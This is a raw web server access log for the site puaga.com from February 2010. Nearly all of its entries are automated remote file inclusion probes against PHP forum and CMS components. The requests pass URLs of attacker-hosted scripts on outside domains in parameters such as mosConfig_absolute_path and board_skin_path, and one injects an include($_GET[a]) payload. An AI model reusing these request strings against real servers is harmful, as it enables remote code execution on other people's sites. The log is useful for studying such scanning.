216.17.109.216 - - [12/Feb/2010:06:53:02 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:37 -0800] "GET /logs/access_100104.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:43 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:43 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:43 -0800] "GET /logs/access_100103.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:53:50 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:53:50 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:53:51 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:01 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:01 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:04 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:13 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:54:32 -0800] "GET /logs/access_100104.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:34 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:54:37 -0800] "GET /logs/access_100128.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:54:37 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:54:37 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:40 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:06:54:46 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:06:54:46 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [12/Feb/2010:06:54:46 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:51 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:51 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:54:51 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:06:54:54 -0800] "GET /bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:06:54:54 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:06:54:54 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:55:00 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:06:55:00 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:02 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:03 -0800] "GET /?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:55:04 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:55:04 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:55:04 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:55:05 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:11 -0800] "GET /logs/access_100126.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:36 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:36 -0800] "GET /?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:55:45 -0800] "GET /logs/access_100126.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:06:56:03 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:06:56:04 -0800] "GET /orange_g/forum/viewtopic.php?p=25890 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:06:56:06 -0800] "GET /orange_g/forum/viewtopic.php?p=27486 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
123.143.29.250 - - [12/Feb/2010:06:56:07 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:06:56:07 -0800] "GET //e404.php?DOCUMENT_ROOT=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:56:11 -0800] "GET /logs/access_100121.log%20//bbs/delete_comment.php?board.skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:56:12 -0800] "GET /bbs/delete_comment.php?board.skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:56:12 -0800] "GET /logs//bbs/delete_comment.php?board.skin_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:06:56:14 -0800] "GET /orange_g/forum/viewtopic.php?p=26536 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:06:56:19 -0800] "GET /orange_g/forum/viewtopic.php?p=25772 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
110.45.146.50 - - [12/Feb/2010:06:56:28 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:56:40 -0800] "GET /logs/access_100203.log//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:06:56:47 -0800] "GET /logs/access_100112.log%20%20///e404.php?DOCUMENT_ROOT=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:56:49 -0800] "GET /logs/access_100202.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [12/Feb/2010:06:57:04 -0800] "GET /logs/access_100115.log%20%20///e404.php?DOCUMENT_ROOT=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:57:19 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:57:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:06:57:23 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:06:57:52 -0800] "GET /logs/access_100126.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:06:59:01 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:07:00:09 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:07:00:12 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:07:00:16 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:07:00:29 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:02:44 -0800] "GET /logs/access_100121.log%20%20//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:02:44 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:07:02:44 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:07:05:35 -0800] "GET /logs/access_100118.log//errors.php?error=http://suspiriaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
220.181.7.38 - - [12/Feb/2010:07:06:18 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
74.50.85.229 - - [12/Feb/2010:07:06:23 -0800] "GET /logs/access_091126.log//index.php//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:06:23 -0800] "GET /logs//index.php//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:06:24 -0800] "GET /index.php//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:07:06:43 -0800] "GET /logs/access_100111.log//errors.php?error=http://suspiriaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:06:49 -0800] "GET /logs/access_100201.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:06:49 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:06:52 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:07:07:14 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:07:29 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:07:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:07:29 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:07:29 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:07:08:04 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:07:08:05 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:07:08:05 -0800] "GET /bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [12/Feb/2010:07:08:16 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:08:18 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:08:18 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:08:18 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:07:08:18 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:11:25 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:07:11:25 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:13:02 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:13:07 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:13:07 -0800] "GET /logs/access_100107.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.20.18.65 - - [12/Feb/2010:07:13:16 -0800] "GET /logs/access_100125.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:13:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:13:48 -0800] "GET /logs/access_100130.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:13:48 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:16:16 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:16:16 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:16:16 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:16:17 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:16:17 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:07:16:17 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:07:16:31 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:18:26 -0800] "GET /logs/access_100105.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:18:26 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [12/Feb/2010:07:18:26 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [12/Feb/2010:07:19:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
